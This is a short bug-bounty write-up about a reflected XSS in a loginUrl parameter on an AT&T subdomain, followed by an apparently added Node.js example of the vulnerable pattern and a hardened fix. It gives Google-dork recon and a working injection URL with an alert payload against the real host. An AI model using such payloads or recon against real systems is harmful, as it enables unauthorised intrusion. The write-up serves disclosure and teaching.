Reflected XSS In AT&T [ $50 ]

Hi. Today I want to share how I found an XSS in AT&T.
I found subdomains using a Google dork.

site:*.att.com

and looked at all the subdomains.

When visiting ilm.att.com

https://ilm.att.com/bizportal/spp/forgotPassword?loginUrl=https://ilm.att.com

It redirects to

https://ilm.att.com/bizportal/spp#/forgotPassword

& I checked the view source. I noticed the JS variable jsloginUrl

Like

var jsuserName = '';
var jsloginUrl = 'https://ilm.att.com';

That is the input value of the loginUrl param. I tried to inject and looked at the view source.

https://ilm.att.com/bizportal/spp/forgotPassword?loginUrl='"></;

var jsuserName = '';
var jsloginUrl = ''"></;';

It's OK.

Try to inject an XSS payload

https://ilm.att.com/bizportal/spp/forgotPassword?loginUrl=x';alert(document.domain);x='

The payload is successfully injected into the webpage

var jsuserName = '';
var jsloginUrl = 'x';alert(document.domain);x='';

I got alert.
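The root cause in the write-up is a query parameter being concatenated straight into a JavaScript string literal inside a <script> block, so a single quote ends the literal and whatever follows runs as code. The following is an added example (not code from the write-up or from AT&T's application) that reproduces that vulnerable pattern in a Node.js template function, then shows a hardened version: validate the redirect target against an allowlist of hosts, and serialize whatever is emitted into the script with an encoder that escapes quotes, backslashes, <, >, & and the U+2028/U+2029 line terminators. The template functions, the allowlist host, and the breaksOutOfLiteral check are all assumptions for illustration; only the loginUrl parameter, the jsuserName/jsloginUrl variable names and the ilm.att.com host come from the write-up.

```javascript
// Added example, not part of the original write-up. The server-side template
// code here is assumed; the parameter name (loginUrl), the emitted variable
// names and the host are the ones the write-up shows.

// Vulnerable: the query parameter is dropped into a JavaScript string literal
// with plain string concatenation, so a single quote in the input ends the
// literal and the rest of the input is parsed as JavaScript.
function renderVulnerable(loginUrl) {
  return "var jsuserName = '';\nvar jsloginUrl = '" + loginUrl + "';";
}

// Serialize a value for embedding inside <script>: JSON.stringify escapes
// quotes and backslashes; the extra replacements stop "</script>" and "<!--"
// from terminating the script block and neutralise U+2028/U+2029, which are
// line terminators in older JS engines.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, "\\u003c")
    .replace(/>/g, "\\u003e")
    .replace(/&/g, "\\u0026")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
}

// Allowlist for a redirect target: a login URL should only ever point back at
// a host the application owns. The host list is an assumption taken from the
// host in the write-up.
const ALLOWED_HOSTS = new Set(["ilm.att.com"]);

function isAllowedLoginUrl(candidate) {
  let url;
  try {
    url = new URL(candidate);
  } catch (e) {
    return false; // not an absolute URL at all
  }
  return url.protocol === "https:" && ALLOWED_HOSTS.has(url.hostname);
}

// Hardened: validate first, then encode. A value that fails validation is
// replaced by a fixed default rather than being reflected in any form.
function renderSafe(loginUrl) {
  const safeUrl = isAllowedLoginUrl(loginUrl) ? loginUrl : "https://ilm.att.com";
  return "var jsuserName = '';\nvar jsloginUrl = " + jsStringLiteral(safeUrl) + ";";
}

// Check helper (assumed, for tests and review): did the rendered jsloginUrl
// line stay a single string literal, or did the input terminate it early?
function breaksOutOfLiteral(rendered) {
  const line = rendered.split("\n").find((l) => l.startsWith("var jsloginUrl"));
  const value = line.slice("var jsloginUrl = ".length).replace(/;$/, "");
  const quote = value[0];
  if (quote !== "'" && quote !== '"') return true;
  if (value[value.length - 1] !== quote) return true;
  const inner = value.slice(1, -1);
  // an unescaped quote of the same kind inside the literal means it was closed early
  return new RegExp("(^|[^\\\\])" + quote).test(inner);
}

// Demo with the constructed input from the write-up's test.
const demoInput = "x';alert(document.domain);x='";
console.log("vulnerable:\n" + renderVulnerable(demoInput));
console.log("hardened:\n" + renderSafe(demoInput));
```

Two separate controls are shown on purpose: the allowlist stops the parameter being used as an open redirect, and the encoder stops it breaking out of the script even for values that pass the allowlist (a path on the allowed host can still contain quotes or "</script>"). Either one alone leaves a gap.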

I reported it to AT&T via HackerOne. After 4 months ….. the bug was resolved.

I am not good in English but I try hard so you can understand what I write. See you in the next bounty writeup.

Thanks for reading

Edit: I got a $50 award.
